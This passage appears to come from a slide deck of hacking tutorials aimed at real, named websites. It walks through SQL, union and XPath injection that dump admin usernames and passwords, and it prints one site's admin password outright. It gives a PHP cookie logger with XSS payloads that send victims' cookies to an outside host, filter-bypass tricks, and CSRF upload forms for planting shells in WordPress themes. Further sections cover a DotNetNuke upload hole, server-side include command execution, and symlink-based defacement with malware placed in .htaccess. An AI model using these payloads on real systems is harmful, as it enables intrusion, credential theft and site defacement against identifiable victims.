    5) Finding usernameand password Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_name from AdminMaster)) Code: http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1 Admin_password from AdminMaster)) Code: Username: admin Password: pothys!@#
  • 54.
    Dot net nuke: DNN is gallery where you can upload on site and in there you can hold pictures and have like "online gallery". That gallery have hole in itself so you can use it to upload files on site with extension: *.gif, *.jpg, *.pdf, *.txt, *.swf.. Google dork to find vulnerable sites: Code: inurl:fck/fcklinkgallery.aspx I'm going to use this site: Code: http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklink gallery.aspx Now if page is loaded it will look like this: which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type javascript to upload file. Code:
  • 55.
    javascript:__doPostBack('ctlURL$cmdUpload','') Choose File andText button Upload Selected File will show up. *on this site letter color matched with background so you will have to select whole page (CTRL+A) and you will see upload button. Upload file and access it by going to sitelink.com/portals/0/filename.extension -> Code: http://kellyballancephotography.com/portals/0/config.txt
  • 56.
    XSS : 1) XSS? XSSlets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting. You can use XSS for many ways. For simple Javascript executing commands, or you can use it to steal cookies. We are Injecting Cookies so we can login somewhere w/o password. 2) Required stuff Mozila FireFox: Code: http://www.mozilla.org/en-US/products/download.html?product=firefox- 3.0.5&os=win&lang=en-GB Add-on Firebug: Code: https://addons.mozilla.org/en-US/firefox/addon/firebug/ Add-on FireCookie: Code: https://addons.mozilla.org/en-US/firefox/addon/firecookie/ Add-on Live HTTP Headers: Code: https://addons.mozilla.org/en- US/firefox/downloads/file/28118/live_http_headers-0.14-fx+sm.xpi It is recommended to have primary knowledge of Javascripts. 3) Testing XSS vulnerability Sites on which we can use this method are sites where is text input and submit button and on sites where you can use GET method to print something. e.g. of GET method: Code: www.sitecom/index.php?page=<script>alert("XSS")</script> Command to check site vulnerability is: Code: <script>alert("XSS")</script> Now I will explain what this command is doing: <script> - opening script tag alert("XSS") - window will pop-up saying "XSS"
  • 57.
    </script> - closescript tag 4) XSS types Cookie Stealing - we are stealing cookies from some user (commonly admin), and input cookie in our browser so when we login to site we are gonna be logged in alrdy. Cross-Site Request Forgery - we are sending some commands without knowing username. XSS Worms - it is "evil" script that have possibility to spread over whole site. Door-Forwarding - script makes iframe which will exploit something or start download some virus, rat, keylogger, istealer, etc... Keylogging - you know what keylogging is. 5) Cookie Stealing For cookie stealing we will need: -Vulnerable site -Web-host for scripts -php script attach this script on some hosting: cookie.php Code: <?php $cookie = $HTTP_GET_VARS["cookie"]; $file = fopen('cookielog.txt', 'a'); fwrite($file, $cookie."n"); ?> script executing: Code: <script>document.location="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> ili <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> ili <script>window.open('http://www.link.com/cookie.php?cookie=' + document.cookie;)</script> ili <script>window.location='http://www.link.com/cookie.php?cookie=' + document.cookie;</script> How this works?
  • 58.
    When some userlog on page with your cookie logger and you save his cookie. Then we take cookie and use it. So here is how we do it: 1) Open Mozilla 2) Open Add-on Fire bug 3) Type cookie name and value. Here is one: Code: PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898 from this cookie title is PHPSESSID from this cookie value is b3e4e100ab6bb912de1b80c4eed7898 6) Filter bypassing
  • 59.
    1) Deleting scripttag e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script delete tags <script> and </script> Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we will add <scr<script>ipt>alert("XSS")</scr</script>ipt> 2) magic_quotes Explained here: Code: http://en.wikipedia.org/wiki/Magic_quotes If you type <script>alert("XSS")</script> and it prints <script>alert("XSS")</script> then it is magic_quotes protection. It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode. Here is example: This is link of our cookie logger: http://link.com/cookie.php we would use <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into: Code: <scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,11 9,119,119,46,108 ,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111 ,1 11,107,105,101,61,)+document.cookie;</scr</script>ipt> This works when you add code ' or " and when you use integer you do not use ' or " and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this tool: Code: Ascii to Decimal http://pookey.co.uk/binary.php 6) Bypass XSS Filters [1] Types of filters : [+]Bypass magic_quotes_gpc (if it's on ) [+]Bypass with cryption in full html [+]Bypass with Obfuscation [+]Bypass with trying around method [+]Bypass magic_quotes_gpc When magic_quotes_gpc is on, it means that the server doesn'tallow, ", / and ' (it depends)
  • 60.
    to bypass itwe use : String.fromCharCode() We write our code, in the () crypted in ASCII exemple : String.fromCharCode(107, 51, 110, 122, 48) (Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48 And we use it : <script>String.fromCharCode(107, 51, 110, 122, 48)</script> We will see : k3nz0 We bypassed magic_quotes_gpc :) [+] Bypass with cryption in full html : Very simple, we have to encodeour codein full HTTP! Our code: <script>alert('i am here')</script> And in full HTTP : %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%6 1%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E Now, you can inject it :) ! Notice that you can use the tool "Coder" to do encode it in full HTTP We bypassed filter. [+] Bypass with Obfuscation : Very simple too, this filter, don'tallows for exemple these words : -script -alert To bypass it, you change "script" with for exemple "sCriPt", and "alert" with "ALerT" ! For exemple : <ScriPt>ALeRt("i am here")</scriPt> We bypassed the filter. [+] Bypass with trying around method : Generally, it is in the searchs scripts, we just add "> at the begining to close current fields : exemple : http://target.com/search.php?search="><script>alert("hello")</script>
  • 61.
    7) XSSER Framework Download: http://sourceforge.net/projects/xsser/ Usage xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)] Options: --version show program's version number and exit -h, --help show this help message and exit -s, --statistics show advanced statistics output results -v, --verbose verbose (default: no) --gtk launch XSSer GTK Interface *Special Features*: You can choose Vector(s) and Bypasser(s) to inject code with this extra special features: --imx=IMX create a false image with XSS code embedded --fla=FLASH create a false .swf file with XSS code embedded *Select Target(s)*: At least one of these options has to be specified to set the source to get target(s) urls from. You need to choose to run XSSer: -u URL, --url=URL Enter target(s) to audit -i READFILE Read target URLs from a file -d DORK Process search engine dork results as target urls
  • 62.
    --De=DORK_ENGINE Search engine touse for dorking (bing, altavista, yahoo, baidu, yandex, youdao, webcrawler,ask, etc. See dork.py file to check for available engines) *Select type of HTTP/HTTPS Connection(s)*: These options can be used to specify which parameter(s) we want to use like payload to inject code. -g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=') -p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=') -c CRAWLING Number of urls to crawl on target(s): 1-99999 --Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5 --Cl Crawl only local target(s) urls (default TRUE) *Configure Request(s)*: These options can be used to specify how to connect to target(s) payload(s). You can select multiple: --cookie=COOKIE Change your HTTP Cookie header --user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED) --referer=REFERER Use another HTTP Referer header (default NONE) --headers=HEADERS Extra HTTP headers newline separated --auth-type=ATYPE HTTP Authentication type (value Basic or Digest) --auth-cred=ACRED HTTP Authentication credentials (value name:password) --proxy=PROXY Use proxy server (tor: http://localhost:8118) --timeout=TIMEOUT Select your Timeout (default 30) --delay=DELAY Delay in seconds between each HTTP request (default 8) --threads=THREADS Maximum number of concurrent HTTP requests (default 5)
  • 63.
    --retries=RETRIES Retries whenthe connection timeouts (default 3) *Select Vector(s)*: These options can be used to specify a XSS vector source code to inject in each payload. Important, if you don't want to try to inject a common XSS vector, used by default. Choose only one option: --payload=SCRIPT OWN - Insert your XSS construction -manually- --auto AUTO - Insert XSSer 'reported' vectors from file *Select Bypasser(s)*: These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it. Also, can be combined with other techniques to provide encoding: --Str Use method String.FromCharCode() --Une Use function Unescape() --Mix Mix String.FromCharCode() and Unescape() --Dec Use Decimal encoding --Hex Use Hexadecimal encoding --Hes Use Hexadecimal encoding, with semicolons --Dwo Encode vectors IP addresses in DWORD --Doo Encode vectors IP addresses in Octal --Cem Try -manually- different Character Encoding mutations (reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex') *Special Technique(s)*: These options can be used to try to inject code using different type of XSS techniques. You can select multiple:
  • 64.
    --Coo COO -Cross Site Scripting Cookie injection --Xsa XSA - Cross Site Agent Scripting --Xsr XSR - Cross Site Referer Scripting --Dcp DCP - Data Control Protocol injections --Dom DOM - Use Anchor Stealth (DOM shadows!) --Ind IND - HTTP Response Splitting Induced code --Anchor ANC - Use Anchor Stealth payloader (DOM shadows!) *Select Final injection(s)*: These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities. Choose only one option: --Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually- --Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly- --Doss DOSs - XSS Denial of service (server) injection --Dos DOS - XSS Denial of service (client) injection --B64 B64 - Base64 code encoding in META tag (rfc2397) *Special Final injection(s)*: These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code): --Onm ONM - Use onMouseMove() event to inject code --Ifr IFR - Use "iframe" source tag to inject code *Miscellaneous*:
  • 65.
    --silent inhibit consoleoutput results --update check for XSSer latest stable version --save output all results directly to template (XSSlist.dat) --xml=FILEXML output 'positives' to aXML file (--xml filename.xml) --publish output 'positives' to Social Networks (identi.ca) --short=SHORTURLS display -final code- shortered (tinyurl, is.gd) --launch launch a browser at the end with each XSS discovered Example : * Simple injectionfromURL: $ pythonxsser.py -u"http://host.com" ------------------- * Simple injectionfromFile,withtor proxy and spoofingHTTP Refererheaders: $ pythonxsser.py -i "file.txt"--proxy"http://127.0.0.1:8118" --referer"666.666.666.666" ------------------- * Multiple injectionsfromURL,with automatic payloading,usingtor proxy, injectingonpayloads character encodingin "Hexadecimal",withverbose outputand saving resultsto file (XSSlist.dat): $ pythonxsser.py -u"http://host.com" --proxy"http://127.0.0.1:8118" --auto--Hex --verbose-w ------------------- * Multiple injectionsfromURL,with automatic payloading,usingcaracter encoding mutations (first, change payload to hexadecimal;second,change to StringFromCharCode the first encoding;third, reencode to Hexadecimal the second encoding),withHTTP User-Agentspoofed,changingtimeoutto "20" and using multithreads(5 threads): $ pythonxsser.py -u"http://host.com" --auto--Cem"Hex,Str,Hex"--user-agent"XSSer!!"--timeout"20" --threads"5" ------------------- * Advance injectionfrom File,payloadingyour -own- payload and using Unescape() character encodingto bypass filters: $ pythonxsser.py -i "urls.txt"--payload 'a="get";b="URL("";c="javascript:";d="alert('XSS');")";eval(a+b+c+d);'--Une -------------------
  • 66.
    * InjectionfromDork selecting"duck"engine (XSSerStorm!): $ pythonxsser.py --De "duck"-d"search.php?" ------------------- * InjectionfromCrawler with deep3 and 4 pagesto see (XSSerSpider!): $ pythonxsser.py -c3--Cw=4-u"http://host.com" ------------------- * Simple injectionfromURL, usingPOST, with statistics results: $ pythonxsser.py -u"http://host.com"-p"index.php?target=search&subtarget=top&searchstring=" -s ------------------- * Multiple injectionsfromURL to a parameter sendingwith GET, usingautomatic payloading,with IP Octal payloading ofuscationand printeringresults ina "tinyurl" shorteredlink(ready for share!): $ pythonxsser.py -u"http://host.com" -g"bs/?q="--auto--Doo--shorttinyurl ------------------- * Simple injectionfromURL, usingGET, injectinga vector in Cookie parameter, trying to use a DOM shadow space (noserver logging!) and ifexistsany "hole",applyingyour manual final payload "malicious" code (readyfor real attacks!): $ pythonxsser.py -u"http://host.com" -g"bs/?q="--Coo--Dom--Fr="!enteryourfinal injectioncode here!" ------------------- * Simple injectionfromURL, usingGET and trying to generate with resultsa "malicious" shorteredlink (is.gd) witha valid DoS (DenegationOfService) browser clientpayload: $ pythonxsser.py -u"http://host.com" -g"bs/?q="--Dos--short"is.gd" ------------------- * Multiple injectionstomultiple places,extractingtargets from a list in a FILE, applying automatic payloading,changing timeoutto "20" and usingmultithreads(5 threads),increasingdelaybetween petitionsto 10 seconds,injectingparametersin HTTP USer-Agent,HTTP Refererand in Cookie parameters, usingproxy Tor, with IP Octal ofuscation,with statisticsresults,in verbose mode and creating shorteredlinks(tinyurl) of any valid injectingpayloadsfound. (real playingmode!): $ pythonxsser.py -i "list_of_url_targets.txt" --auto--timeout"20" --threads"5"--delay"10"--Xsa--Xsr-- Coo --proxy"http://127.0.0.1:8118" --Doo-s --verbose --Dos--short"tinyurl" ------------------- * Injectionofuser XSS vector directlyin a malicious -fake- image created "onthe wild",and ready to be uploaded. $ pythonxsser.py --Imx"test.png"--payload"!enteryourmaliciousinjectioncode here!" ------------------- * Report output 'positives' injectionsofa dorkingsearch (using"ask" dorker) directly to a XML file. $ pythonxsser.py -d"login.php"--De "ask"--xml "security_report_XSSer_Dork_cuil.xml" ------------------- * Publishoutput'positives' injectionsofadorking search (using"duck" dorker) directlyto
  • 67.
    http://identi.ca (federatedXSSpentestingbotnet) $ pythonxsser.py -d"login.php"--De"duck"--publish ------------------- * Create a .swfmovie with XSS code injected $ pythonxsser.py --fla"name_of_file" ------------------- * Senda pre-checkinghashto see if target will generate -false positive- results $ pythonxsser.py -u"host.com"--hash ------------------- * Multiple fuzzinginjectionsfromurl,includingDCP injectionsandexploitingour "own" code,spoofed in a shorteredlink, on positive resultsfounded.XSSreal-time exploiting. $ pythonxsser.py -u"host.com"--auto--Dcp--Fp"enter_your_code_here" --short"is.gd" ------------------- * ExploitingBase64 code encodingin META tag (rfc2397) in a manual payload of a vulnerable target. $ pythonxsser.py -u"host.com"-g"vulnerable_path"--payload"valid_vector_injected" --B64 ------------------- * Exploitingour "own" -remote code- ina payload discoveredusingfuzzingand launch it in a browser directly $ pythonxsser.py -u"host.com"-g"vulnerable_path"--auto--Fr"my_host/path/code.js" --launch
  • 68.
    CRLF : 1) CRLF? Shortcutfrom Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are adding new row (n). 2) Vulnerable places Vulnerable places are anywhere. In this tut. I'm gonna use some chat. 3) Exploiting vulnerability and protection Lets say if you send message chat will look like this: Code: 1.4.2012 10:29 - fodex: Why login page is down? 1.4.2012 10:29 - saiR: Look like somebody deleted login database. 1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you. 1.4.2012 10:30 - saiR: Ok go ahead...n1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php If chat is vulnerable, it's gonna look like this: Code: 1.4.2012 10:30 - saiR: Ok go ahead... 1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in here till I get it back: http://vulnerablesite.com/login.php We wrote second msg from Admin and users will think that Admin sent it actually and will log in to site we gave them. With login we are gonna keylog site logins. 4) Vulnerable script e.g. Code: <?php if(isset($_POST['send_message'])) { if(!empty($_POST['message'])) { $message = htmlspecialchars($_POST['message']); // rest code to send msg } } ?>
  • 69.
    CSRF : 1) CSRF? Shortcutfrom Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute something without knowing username. 2) Vulnerable places Can be used when you are using GET method. If CSRF is dont successfully, attacker can change password of some user. Most common vulnerable places are avatars. 3) Exploiting vulnerability Lets say we have profile link: Code: http://www.link.com/profile.php Where you can see user data (username, avatar, email...). Now when user want to edit his profile using e.g. Code: http://www.link.com/edit_profile.php Now instead of avatar link we gonna add link from profile editing together with new code using GET method. NOTE: We have to use GET method during profile editing otherwise we wont be able to attack. Add avatar link: Code: http://www.link.com/edit_profile.php?password=newpassword password is name of input (It can be different, it's best to chekc source code) Now when we look at avatar we wont be able to see picture (like there is no picture). When other user watch your avatar, if attack was successful, his password is gonna be changed in one we put. 4) Example Of CSRF File Uploading Vulnerability. 1. Wordpress Amplus Themes CSRF File Upload Vulnerability 2. Wordpress Dimension Themes CSRF File Upload Vulnerability 3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability 4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability
  • 70.
    1. Wordpress AmplusThemes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/amplus Exploit & POC : http://site-target/wp-content/themes/amplus/functions/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php 2. Wordpress Dimension Themes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/dimension Exploit & POC : http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload- handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form>
  • 71.
    File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example: http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php 3. Wordpress Euclid Themes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/euclid_v1 Exploit & POC : http://site-target/wp-content/themes/euclid/functions/upload-handler.php http://site-target/wp-content/themes/euclid_v1.x.x/functions/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp-content/themes/euclid/functions/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form> File Access : http://site-target/uploads/[years]/[month]/your_shell.php Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
  • 72.
    4. Wordpress theCottonThemes CSRF File Upload Vulnerability Dork : inurl:wp-content/themes/thecotton_v114/ Exploit & POC : http://site/[patch]/wp-content/themes/thecotton_v114/lib/utils/upload-handler.php Script : <form enctype="multipart/form-data" action="http://127.0.0.1/wp- content/themes/make_a_statement/library/includes/upload-handler.php" method="post"> Your File: <input name="uploadfile" type="file" /><br/> <input type="submit" value="upload" /> </form>
  • 73.
    Server Side Includes| Server Side Inclusion : 1) Introduction Server Side Includes Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update DB, send mails and many other functions. SSI is working like when some run script on that site. Default extension for SSI files is .shtml To get SSI working in that directory where is .shtml is located must be .htaccess file, which holds some configuration included inside file. SSIs is by default disabled you can enable it by creating new .htaccess file with this config: Code: AddType text/html .shtml AddHandler server-parsed .shtml AddHandler server-parsed .html Options Indexes FollowSymLinks Includes 2) SSI creating We are starting script with <!--# Some simple script look like this: <command> <variable>=<variable content>--> Code: <command> - config include flow set printenv echo exec fsize flastmod time & date With --> we end script. script e.g. Code: <!--#include file="yourfilename.txt" --> <!--#echo var='This will write this stupid text.'--> 3) Server Side Inclusion Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have primary knowledge of Bash and Batch programming.
  • 74.
    Site is vulnerableon SSI when extensions ‘.shtml’ ‘.shtm’ or ‘.stm’, are included in Apache config file. e.g. we can create file with next command: Code: <!--#exec cmd='ls -la'--> Save this as .shtml file and open it on site. I think you already know what is going to happen. Hope this helped you!
  • 75.
    Symlink Attack : 1]Upload shell 404.php 2] Upload contact.php & database.php > eg : http://getec.com.ar/wp-content/plugins/akismet/database.php > eg : http://getec.com.ar/wp-content/plugins/akismet/contact.php 3] go to [sec. info] in your shell then [readable : etc/passwd <view>] 4] copy all username & passwd from [ etc/passwd ] 5] paste in [ http://site.com/contact.php ] [ config fucker ] tab. 6] now open your both links : [ http://site.com/database.php & http://site.com/configweb ] > eg : http://getec.com.ar/wp-content/plugins/akismet/database.php > eg : http://getec.com.ar/wp-content/plugins/akismet/configweb/ 7] on configweb page [ you have some text that contain user & password ] [ these files are reverse or linked website details ] 8] Now login to them using database.php [ change password in database ] 9] login to main site then and deface there index.php page. Malware Attachment On Website : 1] Go to Public Html tab on your 404.php shell & 2] Open .htaccess on your shell 3] and past your malware coading.
  • 76.
    Sql injection String& Union based : 1. Sql injection String based [1] Decreption In String based Sql injection : "order by" doesn't work, example: order by 100-- "group by" doesn't work "having 1=2" doesn't work queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi) [2] Example Solution to this issue in order to hack a site with String Based SQL injection The answer to this problem is by using the following format while trying to hack a site with SQLi http://site.com/index.php?id=10' order by 1000--+ That will show us the error, hence displaying the results according to our query. The point here is that we used the quote ' and the + sign in our query id=X' order by--+ Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we String-Union Based SQL injection 1. Obtaining the number of columns (in this example, we'll use 10 columns) http://www.site.com/index.php?id=234' order by 11--+ Results show error, so we'll assume as 10 columns, since it'll be an example for our process 2. Obtaining the Databases
  • 77.
    http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10from information_schema.schemata--+ Results will display the databases on their website Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step 3.Obtaining the Tables from the current Database http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+ Results will display the current table names For this example, we'll be using the table name: "admin" 4. Obtaining Column names from a specific table (which in this example is "admin") http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+ Results will display the column names from the current table To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php For this example, we'll use "username" and "password" as our column names 5.Obtaining Data from Column names http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+ 6. Example : 1. http://www.onthegro.co.za/content.php?id=latest_news' 2. http://www.onthegro.co.za/content.php?id=latest_news' order by 1000 --+ 3. http://www.onthegro.co.za/content.php?id=latest_news' order by 1 --+ 4. http://www.onthegro.co.za/content.php?id=latest_news' order by 2 --+ 5. http://www.onthegro.co.za/content.php?id=latest_news' order by 3 --+ 6. http://www.onthegro.co.za/content.php?id=latest_news' order by 4 --+ 7. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,3,4 --+ 8. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(schema_name,0x0a),4 from information_schema.schemata --+
  • 78.
    9. http://www.onthegro.co.za/content.php?id=-latest_news' orderby 1,2,group_concat(table_name,0x0a),4 from information_schema.tables where table_schema=database()--+ 10. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(column_name,0x0a),4 from information_schema.columns where table_name=0x61646d696e--+ 11. http://www.onthegro.co.za/content.php?id=-latest_news' order by 1,2,group_concat(username,0x3a,password,0x0a),4 from admin--+ 2. Sql injectionUnionbased : [1] Example http://www.naukriguru.com 1. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 100 2. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 10 3. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 20 4. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 50 5. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 40 6. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 30 7. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 35 8. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 33 9. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 32 10. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 order by 31 11. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 12. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31— 13. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31— 14. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31— 15. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31— 16. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31—
  • 79.
    17. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 unionselect 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31— 18. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31— 19. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31 from information_schema.tables where table_schema = database()— 20. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31 from information_schema.columns where table_name = 0x6e675f61646d696e— 21. http://www.naukriguru.com/jobseeker/job-display-walk-in.php?id=-98 union select 1,2,group_concat(id,0x3a,loginid,0x3a,email,0x3a,password,0x3a,name,0x3a,type,0x3a), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from ng_admin— 22. http://www.naukriguru.com/admin/ 23. http://www.naukriguru.com/admin/index.php# 24. http://www.naukriguru.com/admin/add_industry.php
  • 80.
    Xpath Injection : Step1: Inject --> +and extractvalue(rand(),concat(0x0a,version()))-- Eg: http://www.viratcooker.com/recipe.php?ID=3+and%20extractvalue(rand(),/*!concat*/(0x0a,vers ion()))-- msg: Could not query:XPATH syntax error: ' 5.5.32-cll' ===================================================================== Step 2: [Find Tables] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+ Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 0,1)))--+ msg: Could not query:XPATH syntax error: ' :RecipeIngredients' --------------------------------------------------------------------------------------------------------------------- Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4... Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,table_name) from /*!information_schema.tables*/ /*!WHERE*/ /*!table_schema=database()*/ limit 1,1)))--+ msg: Could not query:XPATH syntax error: ' :SS_categories' --------------------------------------------------------------------------------------------------------------------- Respectively :~ For 2,3,4,5,6,7,8..... msg : Could not query:XPATH syntax error: ' :SS_ordered_carts' Could not query:XPATH syntax error: ' :SS_orders' Could not query:XPATH syntax error: ' :SS_products' Could not query:XPATH syntax error: ' :SS_products2' Could not query:XPATH syntax error: ' :SS_special_offers' Could not query:XPATH syntax error: ' :categories'
  • 81.
    Could not query:XPATHsyntax error: ' :details' Could not query:XPATH syntax error: ' :productrange' Could not query:XPATH syntax error: ' :recipes' Could not query:XPATH syntax error: ' :visitors' ===================================================================== Note : Convert table name to HEX [String to hex conversion] Eg : details : 64657461696c73 or 0x64657461696c73 ===================================================================== Step 3: [Finding Columns] Inject --> +and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name=0x64657461696c73 limit 0,1)))--+ Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(0x3a,column_name) from /*!information_schema.columns*/ /*!WHERE*/ /*!column_name=0x64657461696c73*/ limit 0,1)))--+ msg: Could not query:XPATH syntax error: ' :cust_firstname' --------------------------------------------------------------------------------------------------------------------- Note : Set --> [ limit 0,1 ] in above query to 1,2,3,4... Respectively :~ For 2,3,4,5,6,7,8..... msg: Could not query:XPATH syntax error: ' :cust_lastname' msg: Could not query:XPATH syntax error: ' :cust_country' msg: Could not query:XPATH syntax error: ' :cust_zip' msg: Could not query:XPATH syntax error: ' :cust_state' msg: Could not query:XPATH syntax error: ' :cust_city msg: Could not query:XPATH syntax error: ' :cust_address' ===================================================================== Note : In case I got :
  • 82.
    Table -> users Columns-> Password & Email So, ===================================================================== Step 4: Fetching Details Inject ---> +and extractvalue(rand(),concat(0x0a,(select concat(email,0x3a,password) from users limit 0,1)))--+ Eg: www.viratcooker.com/recipe.php?ID=3+and extractvalue(rand(),/*!concat*/(0x0a,(/*!select*/ /*!concat*/(email,0x3a,password) from /*!users*/ limit 0,1)))--+ msg: Could not query:XPATH syntax error: ' :email:password' ===================================================================== =====================================================================
  • 83.
